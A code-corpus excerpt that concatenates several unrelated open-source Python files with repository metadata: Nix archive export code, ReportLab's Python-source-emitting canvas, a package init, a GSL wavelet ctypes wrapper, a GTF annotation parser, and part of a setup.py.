raise ValueError("Unsupported compression type: {}"
.format(compression_type))
if store_path in cls.NAR_PATH_CACHE[compression_type]:
return cls.NAR_PATH_CACHE[compression_type][store_path]
logging.info("Kicking off NAR build of {}, {} compression"
.format(basename(store_path), compression_type))
# Construct a nix expression which will produce a nar.
nar_expr = "".join([
"(import <nix/nar.nix> {",
'storePath = "{}";'.format(store_path),
'hashAlgo = "sha256";',
'compressionType = "{}";'.format(compression_type),
"})"])
# Nix-build this expression, resulting in a store object.
nar_dir = strip_output(
nix_cmd("nix-build", ["--expr", nar_expr, "--no-out-link"]),
hide_stderr=quiet)
return cls.register_nar_path(nar_dir, store_path, compression_type)
@classmethod
def register_nar_path(cls, nar_dir, store_path, compression_type):
"""After a NAR has been built, this adds the path to the cache."""
# There should be a file with this extension in the directory.
extension = ".nar." + ("bz2" if compression_type == "bzip2" else "xz")
contents = map(decode_str, os.listdir(nar_dir))
for filename in contents:
if filename.endswith(extension):
nar_path = join(nar_dir, filename)
cls.NAR_PATH_CACHE[compression_type][store_path] = nar_path
return nar_path
# This might happen if we run out of disk space or something
# else terrible.
raise NoNarGenerated(nar_dir, extension)
@classmethod
@lru_cache(1024)
def get_nar_dir(cls, store_path, compression_type):
"""Get the directory of a nix archive without building it."""
if compression_type not in ("xz", "bzip2"):
raise ValueError("Unsupported compression type: {}"
.format(compression_type))
# Construct a nix expression which will produce a nar.
nar_expr = "".join([
"(import <nix/nar.nix> {",
'storePath = "{}";'.format(store_path),
'hashAlgo = "sha256";',
'compressionType = "{}";'.format(compression_type),
"})"])
# Nix-build this expression, resulting in a store object.
derivation_path = strip_output(
nix_cmd("nix-instantiate", ["--expr", nar_expr, "--no-gc-warning"]))
derivation = Derivation.parse_derivation_file(derivation_path)
return derivation.outputs["out"]
@classmethod
def from_store_path(cls, store_path, compression_type="xz"):
"""Load a narinfo from a store path.
:param store_path: Path in the nix store to load info on.
:type store_path: ``str``
:param compression_type: What type of compression to use on the NAR.
:return: A NarInfo for the path.
:rtype: :py:class:`NarInfo`
"""
if store_path in cls.NARINFO_CACHE[compression_type]:
return cls.NARINFO_CACHE[compression_type][store_path]
# Build the compressed version. Compute its hash and size.
nar_path = cls.build_nar(store_path, compression_type=compression_type)
du = strip_output("du -sb {}".format(nar_path))
file_size = int(du.split()[0])
file_hash = strip_output(nix_cmd("nix-hash", ["--type", "sha256",
"--base32", "--flat", nar_path]))
nar_size = query_store(store_path, "--size")
nar_hash = query_store(store_path, "--hash")
references = query_store(store_path, "--references").split()
deriver = query_store(store_path, "--deriver")
extension = ".nar." + ("bz2" if compression_type == "bzip2" else "xz")
narinfo = cls(
url="nar/{}{}".format(basename(store_path)[:32], extension),
compression=compression_type,
store_path=store_path,
nar_hash=nar_hash,
nar_size=nar_size,
file_size=str(file_size),
file_hash="sha256:{}".format(file_hash),
references=references,
deriver=None if deriver == "unknown-deriver" else deriver,
signature=None
)
cls.NARINFO_CACHE[compression_type][store_path] = narinfo
return narinfo
class NarExport(object):
"""A nix archive augmented with some metadata.
A nix export is a nix archive coupled with some metadata, created
with the `nix-store --export` command. Specifically, it adds
information about references and optionally a deriver path.
"""
def __init__(self, store_path, nar_bytes, references, deriver, signature):
"""Initializer.
:param store_path: Path to the object being encoded.
:type store_path: ``str``
:param nar: The bytes of a nix archive.
:type nar: ``bytes``
:param references: A list of paths that the object refers
to. These should be absolute paths.
:type references: ``list`` of ``str``
:param deriver: The absolute path to the derivation that
built the object. Optional.
:type deriver: ``str`` or ``NoneType``
:param signature: Signature of the binary cache. Optional, but
might be required depending on the nix settings.
:type signature: ``str`` or ``NoneType``
"""
self.store_path = store_path
self.nar_bytes = nar_bytes
self.references = references
self.deriver = deriver
self.signature = signature
_paths = [store_path] + references
if deriver is not None:
_paths.append(deriver)
for path in _paths:
if not os.path.isabs(path):
raise ValueError("Paths must be absolute ({}).".format(path))
def import_to_store(self):
"""Import this NarExport into the local nix store."""
proc = Popen(nix_cmd("nix-store", ["--import", "-vvvvv"]),
stdin=PIPE, stdout=PIPE, stderr=PIPE)
out, err = proc.communicate(input=self.to_bytes())
if proc.returncode == 0:
return decode_str(out)
else:
raise NixImportFailed(err, store_path=self.store_path)
def to_bytes(self):
"""Convert a nar export into bytes.
Nix exports are a binary format. The input to this function is
a bytestring intended to have been created from a call to
`nix-store --dump`, or equivalently, as returned by a nix
binary cache. The logic of this function adds a few things:
* An 8-byte magic header, which nix-store reads when it imports.
* The bytes of the NAR itself.
* Another magic bytestring, which is 'NIXE' followed by four nulls.
* The path to the object in the nix store being imported.
* The number of references.
* The path of each reference.
* The deriver path, if known (else an empty string).
* 8 empty bytes, to indicate we're not including a signature.
* 8 empty bytes, for reasons unknown to me but needed by nix-store.
Each string referenced above (e.g. paths) is represented by
first writing its length as an integer encoded in
little-endian 8 bytes, then the string itself, and then as
many null bytes as are needed to get to the nearest multiple
of 8 bytes. So for example, the string "hello" would be
represented as
"\x05\x00\x00\x00\x00\x00\x00\x00hello\x00\x00\x00"
Note that there are three zeros following the "hello" text, in
order to pad it to eight bytes.
"""
def addstr(bytesio, bstring):
"""Utility function, adds a string with padding to the bytes."""
_len = len(bstring)
bytesio.write(_len.to_bytes(8, "little"))
bytesio.write(bstring)
if _len % 8 != 0:
bytesio.write(EIGHT_ZEROS[:8 - (_len % 8)])
# Start with the magic header and nar bytes.
bio = BytesIO()
bio.write(EXPORT_INITIAL_MAGIC)
bio.write(self.nar_bytes)
# Write the magic value for the metadata.
bio.write(EXPORT_METADATA_MAGIC)
# Write the store path of the object.
addstr(bio, self.store_path.encode("utf-8"))
# Write the number of references, and each reference.
bio.write(len(self.references).to_bytes(8, "little"))
for ref in self.references:
addstr(bio, ref.encode("utf-8"))
if self.deriver is not None:
addstr(bio, self.deriver.encode("utf-8"))
else:
addstr(bio, b"")
if self.signature is not None:
# First write a '1' to tell nix that we have a signature.
bio.write((1).to_bytes(8, "little"))
# Then write the signature.
addstr(bio, self.signature.encode("utf-8"))
else:
# Write a zero here so that nix doesn't look for a signature.
bio.write(EIGHT_ZEROS)
# Write a final zero to indicate the end of the export.
bio.write(EIGHT_ZEROS)
# Return the contents of the bytesio as the resulting bytestring.
return bio.getvalue()
| {
"repo_name": "NarrativeScience/pynix",
"path": "src/pynix/narinfo.py",
"copies": "1",
"size": "18302",
"license": "mit",
"hash": 4220987715986397700,
"line_mean": 38.8736383442,
"line_max": 80,
"alpha_frac": 0.5947437439,
"autogenerated": false,
"ratio": 3.915703893881044,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5010447637781044,
"avg_score": null,
"num_lines": null
} |
__doc__ = """pycanvas.Canvas : a Canvas class which can also output Python source code.
pycanvas.Canvas class works exactly like canvas.Canvas, but you can
call str() on pycanvas.Canvas instances. Doing so will return the
Python source code equivalent to your own program, which would, when
run, produce the same PDF document as your original program.
Generated Python source code defines a doIt() function which accepts
a filename or file-like object as its first parameter, and an
optional boolean parameter named "regenerate".
The doIt() function will generate a PDF document and save it in the
file you specified in this argument. If the regenerate parameter is
set then it will also return an automatically generated equivalent
Python source code as a string of text, which you can run again to
produce the very same PDF document and the Python source code, which
you can run again... ad nauseam ! If the regenerate parameter is
unset or not used at all (it then defaults to being unset) then None
is returned and the doIt() function is much much faster, it is also
much faster than the original non-serialized program.
the reportlab/test/test_pdfgen_pycanvas.py program is the test suite
for pycanvas, you can do the following to run it :
First set verbose=1 in reportlab/rl_config.py
then from the command interpreter :
$ cd reportlab/test
$ python test_pdfgen_pycanvas.py >n1.py
this will produce both n1.py and test_pdfgen_pycanvas.pdf
then :
$ python n1.py n1.pdf >n2.py
$ python n2.py n2.pdf >n3.py
$ ...
n1.py, n2.py, n3.py and so on will be identical files.
they eventually may end being a bit different because of
rounding problems, mostly in the comments, but this
doesn't matter since the values really are the same
(e.g. 0 instead of 0.0, or .53 instead of 0.53)
n1.pdf, n2.pdf, n3.pdf and so on will be PDF files
similar to test_pdfgen_pycanvas.pdf.
Alternatively you can import n1.py (or n3.py, or n16384.py if you prefer)
in your own program, and then call its doIt function :
import n1
pythonsource = n1.doIt("myfile.pdf", regenerate=1)
Or if you don't need the python source code and want a faster result :
import n1
n1.doIt("myfile.pdf")
When the generated source code is run directly as an independant program,
then the equivalent python source code is printed to stdout, e.g. :
python n1.py
will print the python source code equivalent to n1.py
Why would you want to use such a beast ?
- To linearize (serialize?) a program : optimizing some complex
parts for example.
- To debug : reading the generated Python source code may help you or
the ReportLab team to diagnose problems. The generated code is now
clearly commented and shows nesting levels, page numbers, and so
on. You can use the generated script when asking for support : we
can see the results you obtain without needing your datas or complete
application.
- To create standalone scripts : say your program uses a high level
environment to generate its output (databases, RML, etc...), using
this class would give you an equivalent program but with complete
independance from the high level environment (e.g. if you don't
have Oracle).
- To contribute some nice looking PDF documents to the ReportLab website
without having to send a complete application you don't want to
distribute.
- ... Insert your own ideas here ...
- For fun because you can do it !
"""
import cStringIO
from reportlab.pdfgen import canvas
from reportlab.pdfgen import pathobject
from reportlab.pdfgen import textobject
PyHeader = '''#! /usr/bin/env python
#
# This code was entirely generated by ReportLab (http://www.reportlab.com)
#
import sys
from reportlab.pdfgen import pathobject
from reportlab.pdfgen import textobject
from reportlab.lib.colors import Color
def doIt(file, regenerate=0) :
"""Generates a PDF document, save it into file.
file : either a filename or a file-like object.
regenerate : if set then this function returns the Python source
code which when run will produce the same result.
if unset then this function returns None, and is
much faster.
"""
if regenerate :
from reportlab.pdfgen.pycanvas import Canvas
else :
from reportlab.pdfgen.canvas import Canvas
'''
PyFooter = '''
# if we want the equivalent Python source code, then send it back
if regenerate :
return str(c)
if __name__ == "__main__" :
if len(sys.argv) != 2 :
# second argument must be the name of the PDF file to create
sys.stderr.write("%s needs one and only one argument\\n" % sys.argv[0])
sys.exit(-1)
else :
# we've got a filename, we can proceed.
print doIt(sys.argv[1], regenerate=1)
sys.exit(0)'''
def buildargs(*args, **kwargs) :
"""Constructs a printable list of arguments suitable for use in source function calls."""
arguments = ""
for arg in args :
arguments = arguments + ("%s, " % repr(arg))
for (kw, val) in kwargs.items() :
arguments = arguments+ ("%s=%s, " % (kw, repr(val)))
if arguments[-2:] == ", " :
arguments = arguments[:-2]
return arguments
class PDFAction :
"""Base class to fake method calls or attributes on PDF objects (Canvas, PDFPathObject, PDFTextObject)."""
def __init__(self, parent, action) :
"""Saves a pointer to the parent object, and the method name."""
self._parent = parent
self._action = action
def __getattr__(self, name) :
"""Probably a method call on an attribute, returns the real one."""
return getattr(getattr(self._parent._object, self._action), name)
def __call__(self, *args, **kwargs) :
"""The fake method is called, print it then call the real one."""
if not self._parent._parent._in :
self._precomment()
self._parent._parent._PyWrite(" %s.%s(%s)" % (self._parent._name, self._action, apply(buildargs, args, kwargs)))
self._postcomment()
self._parent._parent._in = self._parent._parent._in + 1
retcode = apply(getattr(self._parent._object, self._action), args, kwargs)
self._parent._parent._in = self._parent._parent._in - 1
return retcode
def __hash__(self) :
return hash(getattr(self._parent._object, self._action))
def __coerce__(self, other) :
"""Needed."""
return coerce(getattr(self._parent._object, self._action), other)
def _precomment(self) :
"""To be overriden."""
pass
def _postcomment(self) :
"""To be overriden."""
pass
class PDFObject :
"""Base class for PDF objects like PDFPathObject and PDFTextObject."""
_number = 0
def __init__(self, parent) :
"""Saves a pointer to the parent Canvas."""
self._parent = parent
self._initdone = 0
def __getattr__(self, name) :
"""The user's programs wants to call one of our methods or get an attribute, fake it."""
return PDFAction(self, name)
def __repr__(self) :
"""Returns the name used in the generated source code (e.g. 'p' or 't')."""
return self._name
def __call__(self, *args, **kwargs) :
"""Real object initialisation is made here, because now we've got the arguments."""
if not self._initdone :
self.__class__._number = self.__class__._number + 1
methodname = apply(self._postinit, args, kwargs)
self._parent._PyWrite("\n # create PDF%sObject number %i\n %s = %s.%s(%s)" % (methodname[5:], self.__class__._number, self._name, self._parent._name, methodname, apply(buildargs, args, kwargs)))
self._initdone = 1
return self
class Canvas :
"""Our fake Canvas class, which will intercept each and every method or attribute access."""
class TextObject(PDFObject) :
_name = "t"
def _postinit(self, *args, **kwargs) :
self._object = apply(textobject.PDFTextObject, (self._parent, ) + args, kwargs)
return "beginText"
class PathObject(PDFObject) :
_name = "p"
def _postinit(self, *args, **kwargs) :
self._object = apply(pathobject.PDFPathObject, args, kwargs)
return "beginPath"
class Action(PDFAction) :
"""Class called for every Canvas method call."""
def _precomment(self) :
"""Outputs comments before the method call."""
if self._action == "showPage" :
self._parent._PyWrite("\n # Ends page %i" % self._parent._pagenumber)
elif self._action == "saveState" :
state = {}
d = self._parent._object.__dict__
for name in self._parent._object.STATE_ATTRIBUTES:
state[name] = d[name]
self._parent._PyWrite("\n # Saves context level %i %s" % (self._parent._contextlevel, state))
self._parent._contextlevel = self._parent._contextlevel + 1
elif self._action == "restoreState" :
self._parent._contextlevel = self._parent._contextlevel - 1
self._parent._PyWrite("\n # Restores context level %i %s" % (self._parent._contextlevel, self._parent._object.state_stack[-1]))
elif self._action == "beginForm" :
self._parent._formnumber = self._parent._formnumber + 1
self._parent._PyWrite("\n # Begins form %i" % self._parent._formnumber)
elif self._action == "endForm" :
self._parent._PyWrite("\n # Ends form %i" % self._parent._formnumber)
elif self._action == "save" :
self._parent._PyWrite("\n # Saves the PDF document to disk")
def _postcomment(self) :
"""Outputs comments after the method call."""
if self._action == "showPage" :
self._parent._pagenumber = self._parent._pagenumber + 1
self._parent._PyWrite("\n # Begins page %i" % self._parent._pagenumber)
elif self._action in [ "endForm", "drawPath", "clipPath" ] :
self._parent._PyWrite("")
_name = "c"
def __init__(self, *args, **kwargs) :
"""Initialize and begins source code."""
self._parent = self # nice trick, isn't it ?
self._in = 0
self._contextlevel = 0
self._pagenumber = 1
self._formnumber = 0
self._footerpresent = 0
self._object = apply(canvas.Canvas, args, kwargs)
self._pyfile = cStringIO.StringIO()
self._PyWrite(PyHeader)
try :
del kwargs["filename"]
except KeyError :
pass
self._PyWrite(" # create the PDF document\n %s = Canvas(file, %s)\n\n # Begins page 1" % (self._name, apply(buildargs, args[1:], kwargs)))
def __nonzero__(self) :
"""This is needed by platypus' tables."""
return 1
def __str__(self) :
"""Returns the equivalent Python source code."""
if not self._footerpresent :
self._PyWrite(PyFooter)
self._footerpresent = 1
return self._pyfile.getvalue()
def __getattr__(self, name) :
"""Method or attribute access."""
if name == "beginPath" :
return self.PathObject(self)
elif name == "beginText" :
return self.TextObject(self)
else :
return self.Action(self, name)
def _PyWrite(self, pycode) :
"""Outputs the source code with a trailing newline."""
self._pyfile.write("%s\n" % pycode)
if __name__ == '__main__':
print 'For test scripts, look in reportlab/test'
| {
"repo_name": "alexissmirnov/donomo",
"path": "donomo_archive/lib/reportlab/pdfgen/pycanvas.py",
"copies": "2",
"size": "12041",
"license": "bsd-3-clause",
"hash": -2903274007770771500,
"line_mean": 37.9676375405,
"line_max": 212,
"alpha_frac": 0.6247819949,
"autogenerated": false,
"ratio": 3.980495867768595,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.006654322782746797,
"num_lines": 309
} |
"""A Python frontend to ontologies.
**pronto** is a Python agnostic library designed to work with ontologies. At
the moment, it can parse ontologies in the OBO, OBO Graphs or OWL in RDF/XML
format, on either the local host or from an network location, and export
ontologies to OBO or OBO Graphs (in JSON format).
Caution:
Only classes and modules reachable from the top-level package ``pronto``
are considered public and are guaranteed stable over `Semantic Versioning
<https://semver.org/>`_. Use submodules (other than `~pronto.warnings`)
at your own risk!
Note:
``pronto`` implements proper *type checking* for most of the methods and
properties exposed in the public classes. This reproduces the behaviour
of the Python standard library, to avoid common errors. This feature does
however increase overhead, but can be disabled by executing Python in
optimized mode (with the ``-O`` flag). *Parsing performances are not
affected.*
"""
from .definition import Definition
from .entity import Entity
from .metadata import Metadata, Subset
from .ontology import Ontology
from .pv import LiteralPropertyValue, PropertyValue, ResourcePropertyValue
from .relationship import Relationship, RelationshipData, RelationshipSet
from .synonym import Synonym, SynonymData, SynonymType
from .term import Term, TermData, TermSet
from .utils import warnings
from .xref import Xref
# Using `__name__` attribute instead of directly using the name as a string
# so the linter doesn't complaint about unused imports in the top module
__all__ = [
# modules
"warnings",
# classes
Ontology.__name__,
Entity.__name__,
Term.__name__,
TermData.__name__,
TermSet.__name__,
Metadata.__name__,
Subset.__name__,
Definition.__name__,
Relationship.__name__,
RelationshipData.__name__,
RelationshipSet.__name__,
Synonym.__name__,
SynonymData.__name__,
SynonymType.__name__,
PropertyValue.__name__,
LiteralPropertyValue.__name__,
ResourcePropertyValue.__name__,
Xref.__name__,
]
__author__ = "Martin Larralde <martin.larralde@embl.de>"
__license__ = "MIT"
__version__ = "2.4.2"
# Update the docstring with a link to the right version of the documentation
# instead of the latest.
if __doc__ is not None:
__doc__ += f"""See Also:
Online documentation for this version of the library on
`Read The Docs <https://pronto.readthedocs.io/en/v{__version__}/>`_
"""
| {
"repo_name": "althonos/pronto",
"path": "pronto/__init__.py",
"copies": "1",
"size": "2473",
"license": "mit",
"hash": -1720939510308966000,
"line_mean": 33.8309859155,
"line_max": 77,
"alpha_frac": 0.7060250708,
"autogenerated": false,
"ratio": 3.858034321372855,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 71
} |
#A Python/GSL Wavelet library
# Dale Roberts <dale.o.roberts@gmail.com>
import numpy as np
from ctypes import CDLL, POINTER as PTR, RTLD_GLOBAL, Structure, c_size_t, c_double, c_char_p, c_int
# load BLAS and GSL
from ctypes.util import find_library
libblas = CDLL(find_library("libblas"), RTLD_GLOBAL)
libgslcblas = CDLL(find_library("gslcblas"), RTLD_GLOBAL)
libgsl = CDLL(find_library("gsl"), RTLD_GLOBAL)
class gsl_wavelet_type(Structure):
pass
class gsl_wavelet(Structure):
pass
class gsl_wavelet_workspace(Structure):
pass
p_gsl_wavelet_type = PTR(gsl_wavelet_type)
def _p_const(fname):
return p_gsl_wavelet_type.in_dll(libgsl,"gsl_wavelet_" + fname)
def _types(fname, restype, argtypes):
f = libgsl.__getattr__("gsl_wavelet_" + fname)
if restype != None:
f.restype = restype
f.argtypes = argtypes
return f
_types("alloc", PTR(gsl_wavelet), [p_gsl_wavelet_type, c_size_t])
_types("free", None, [PTR(gsl_wavelet)])
_types("name", c_char_p, [PTR(gsl_wavelet)])
_types("workspace_alloc", PTR(gsl_wavelet_workspace), [c_size_t])
_types("workspace_free", None, [PTR(gsl_wavelet_workspace)])
_types("transform_forward", c_int, [PTR(gsl_wavelet), PTR(c_double), c_size_t, c_size_t, PTR(gsl_wavelet_workspace)])
_types("transform_inverse", c_int, [PTR(gsl_wavelet), PTR(c_double), c_size_t, c_size_t, PTR(gsl_wavelet_workspace)])
def gsl_dwt(x, family="haar", k=2, stride=1):
# create a new array as GSL destroys input data, coerce to double too
z = np.array(x, dtype=np.double)
# allocate workspace and wavelet
t = libgsl.gsl_wavelet_workspace_alloc(len(z))
w = libgsl.gsl_wavelet_alloc(_p_const(family), k)
# do the transform
libgsl.gsl_wavelet_transform_forward(w,
z.ctypes.data_as(PTR(c_double)),
stride, len(z), t)
# free objects
libgsl.gsl_wavelet_free(w)
libgsl.gsl_wavelet_workspace_free(t)
# return result
return z
def gsl_idwt(x, family="haar", k=2, stride=1):
# create a new array as GSL destroys input data, coerce to double too
z = np.array(x, dtype=np.double)
# allocate workspace and wavelet
t = libgsl.gsl_wavelet_workspace_alloc(len(z))
w = libgsl.gsl_wavelet_alloc(_p_const(family), k)
# do the transform
libgsl.gsl_wavelet_transform_inverse(w,
z.ctypes.data_as(PTR(c_double)),
stride, len(z), t)
# free objects
libgsl.gsl_wavelet_free(w)
libgsl.gsl_wavelet_workspace_free(t)
# return result
return z
if __name__ == '__main__':
x = np.array([0.]*16)
x[0]=1.
print x
print '-'*8
print gsl_dwt(x)
| {
"repo_name": "daleroberts/py-dwt",
"path": "dwt.py",
"copies": "1",
"size": "2610",
"license": "bsd-3-clause",
"hash": 6594009633114817000,
"line_mean": 32.0379746835,
"line_max": 117,
"alpha_frac": 0.6647509579,
"autogenerated": false,
"ratio": 2.668711656441718,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3833462614341718,
"avg_score": null,
"num_lines": null
} |
# Riyaz Faizullabhoy
# 7/9/2012
# GTF --> GTF Objects
import argparse
import bisect
import copy
import sys
import warnings
from bisect import *
def run():
"""Runs gtf_parser.py and creates transcript objects for the input GTF
file.
Usage: python gtf_parser.py <gtf-input-file-name>
The GTF file must be in the current directory
"""
parser = argparse.ArgumentParser()
parser.add_argument('gi',
metavar='gtf_input',
help="The GTF annotation input file name")
try:
args = parser.parse_args()
except ValueError as IOError:
print >> sys.stderr, "Parsing Error, please use the following ' \
'command-line format:\npython gtf_parser.py <GTF_FILE_NAME>"
return gtf_parse(args.gi)
class Transcript(object):
"""An object for a given transcript id in the GTF file.
Will be in the output.
"""
def __init__(
self,
transcript_id,
refname,
strand,
frame,
gene_id_attributes,
gene_id,
score = None,
source = None):
self.transcript_id = transcript_id
self.refname = refname
self.strand = strand
if strand == "+":
self._is_reverse = False
else:
self._is_reverse = True
self.frame = frame
self.gene_id_attributes = gene_id_attributes
self.gene_id = gene_id
self.exons = []
self._furthest_added_exon = None
if score == '.':
self.score = None
else:
self.score = score
self.source = source
def add_exon(self, exon):
"""Adds an exon to the transcript object.
Throws an exception if the exon is out of order in the GTF file,
or when it overlaps another exon. If an exception is thrown for
a given transcript, it will not be included for the output.
"""
if exon[0] > exon[1]:
raise Exception(
"Invalid exon start/stop in transcript: " + \
str(self.transcript_id))
if exon[0] == self._furthest_added_exon:
raise Exception( 'Non-sensical exons. ' + \
'One begins right after the other ends.' + \
' This should all be one exon: {0}'.format( self ) )
# Add an exon to the end (i.e. exons are in order)
if self._furthest_added_exon < exon[0] or \
self._furthest_added_exon is None:
self.exons += [exon]
self._furthest_added_exon = exon[1]
return
for e in self.exons:
if (e[1] >= exon[0]) and (exon[1] >= e[0]):
raise Exception(
"Overlapping exon in transcript: " + str(self.transcript_id))
# Add an exon elsewhere, to keep exons sorted
index = bisect_left( self.exons, exon )
self.exons.insert(index, exon)
@property
def front_coordinate(self):
"""Returns the left-most coordinate of the left-most exon of the
transcript object."""
return self.exons[0][0]
@property
def end_coordinate(self):
"""Returns the right-most coordinate of the last (right-most) exon of
the transcript object."""
return self.exons[-1][1]
def compatible(self, pos):
"""Returns the exon index if 'pos' is inside one of the exons.
Else, returns None
"""
for idx, exon in enumerate(self.exons):
if pos >= exon[0] and pos < exon[1]:
return idx
return None
def to_gtf(self):
if len(self.exons) == 0:
raise Exception( 'Cannot print to GTF if no exons' )
trans_str = []
trans_str.append(self.refname)
trans_str.append(self.source if self.source is not None else 'NA')
trans_str.append('exon')
all_exons = []
for ex in self.exons:
exon_str = copy.deepcopy(trans_str)
exon_str.append(str(ex[0] + 1))
exon_str.append(str(ex[1]))
if self.score is None:
exon_str.append('.')
else:
exon_str.append(self.score)
exon_str.append('-' if self.is_reverse else '+')
exon_str.append(str(self.frame))
exon_str.append('gene_id "' + self.gene_id + '";' +
' transcript_id "' + self.transcript_id + '";')
# FIXME: after gene_id_attributes is parsers correctly, add this
# line. (and a space)
# self.gene_id_attributes)
all_exons.append('\t'.join(exon_str))
return '\n'.join(all_exons)
@property
def is_reverse(self):
return self._is_reverse
def __repr__(self):
return self.__str__()
def __str__(self):
return '{0}:{1}:{2}-{3}'.format(
self.transcript_id,
self.refname,
self.front_coordinate,
self.end_coordinate)
def gtf_parse(input_gtf):
"""Parses the input GTF file by line.
Creates a list of transcript objects that include each transcript's id,
refname, strand, frame, gene id, and its exons. Uses pythonic 0-based
right-exclusive coordinates. For example, start: 1, end: 2 would be an
exon of length one (at 2) in genomic one-based coordinates.
"""
transcript_dictionary = {}
bad_transcripts = []
current_transcript = None
gtf_file = open(input_gtf, 'r')
for line in gtf_file:
if line.startswith('#'):
continue
gtf_line = (line.split("\t"))
if len(gtf_line) < 9 or gtf_line[2] != "exon":
continue
try:
transcript_id = (
gtf_line[8].split(";")[1].split(" ")[2].replace(
"\"",
""))
if transcript_id in bad_transcripts:
continue
except IndexError as i:
print >> sys.stderr, "GTF File Input missing 'transcript_id' field"
if current_transcript is None:
try:
# FIXME: gene_id_attributes isn't being parsed correctly
gene_id = gtf_line[8].split(";")[0].split(
" ")[1].replace("\"", "")
current_transcript = Transcript(
transcript_id,
gtf_line[0],
gtf_line[6],
gtf_line[7],
gtf_line[8].split(" ")[3],
gene_id,
gtf_line[5],
gtf_line[1])
transcript_dictionary[transcript_id] = current_transcript
transcript_dictionary[transcript_id].add_exon(
( int(gtf_line[3]) - 1, int(gtf_line[4]) ) )
except IndexError as i:
print >> sys.stderr, "GTF File Input missing fields"
except Exception as e:
print >> sys.stderr, e
bad_transcripts += current_transcript.transcript_id
current_transcript = None # throw out the bad transcript
transcript_dictionary[transcript_id] = None
elif transcript_id != current_transcript.transcript_id:
try:
transcript_dictionary[transcript_id].add_exon(
( int(gtf_line[3]) - 1,
int(gtf_line[4]) ) )
current_transcript = transcript_dictionary[transcript_id]
except KeyError as k:
gene_id = gtf_line[8].split(";")[0].split(
" ")[1].replace("\"", "")
# FIXME: gene_id_attributes isn't being parsed correctly
current_transcript = Transcript(
transcript_id,
gtf_line[0],
gtf_line[6],
gtf_line[7],
gtf_line[8].split(" ")[
4:],
gene_id,
gtf_line[5],
gtf_line[1])
transcript_dictionary[transcript_id] = current_transcript
transcript_dictionary[transcript_id].add_exon(
(int(gtf_line[3]) - 1,
int(gtf_line[4])))
except IndexError as i:
print >> sys.stderr, "GTF File Input missing fields"
except Exception as e:
print >> sys.stderr, (e)
bad_transcripts += current_transcript.transcript_id
current_transcript = None
transcript_dictionary[transcript_id] = None
else:
try:
current_transcript.add_exon(
(int(gtf_line[3]) - 1,
int(gtf_line[4])))
except IndexError as i:
print >> sys.stderr, "GTF File Input missing fields"
except Exception as e:
print >> sys.stderr, e
bad_transcripts += current_transcript.transcript_id
current_transcript = None
transcript_dictionary[transcript_id] = None
gtf_file.close()
return transcript_dictionary
def gtf_write(all_trans, out_handle):
all_trans = sorted( all_trans.values(), key = lambda t: (t.refname,
t.front_coordinate) )
print all_trans
for trans in all_trans:
print >> out_handle, trans.to_gtf()
if (__name__ == "__main__"):
run()
| {
"repo_name": "riyazdf/gtf-parser",
"path": "lib/src/gtf_parser.py",
"copies": "1",
"size": "10645",
"license": "mit",
"hash": -813180131919394000,
"line_mean": 32.4748427673,
"line_max": 81,
"alpha_frac": 0.5458900892,
"autogenerated": false,
"ratio": 4.07230298393267,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.511819307313267,
"avg_score": null,
"num_lines": null
} |
"""A pythonic alternative to pandocfilters
See:
https://github.com/sergiocorreia/panflute
"""
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Import version number
version = {}
with open("panflute/version.py") as fp:
exec(fp.read(), version)
version = version['__version__']
setup(
name='panflute',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=version,
description='Pythonic Pandoc filters',
long_description=long_description,
long_description_content_type='text/markdown',
# The project's main homepage.
url='https://github.com/sergiocorreia/panflute',
project_urls={
"Source": "https://github.com/sergiocorreia/panflute",
"Documentation": "http://scorreia.com/software/panflute/",
"Tracker": "https://github.com/sergiocorreia/panflute/issues",
},
# Author details
author="Sergio Correia",
author_email='sergio.correia@gmail.com',
# Choose your license
license='BSD3',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
# Indicate who your project is intended for
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Topic :: Text Processing :: Filters',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
# What does your project relate to?
keywords='pandoc pandocfilters markdown latex',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests', 'examples']),
python_requires='>=3.6',
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[
'click >=6,<9',
'pyyaml >=3,<6',
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,pypi]
extras_require={
'dev': [
'configparser',
'coverage',
'flake8',
'pandocfilters',
'pytest-cov',
'pytest',
'requests',
],
'pypi': [
'docutils',
'Pygments',
'twine',
'wheel',
]
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
#package_data={
# 'sample': ['package_data.dat'],
#},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
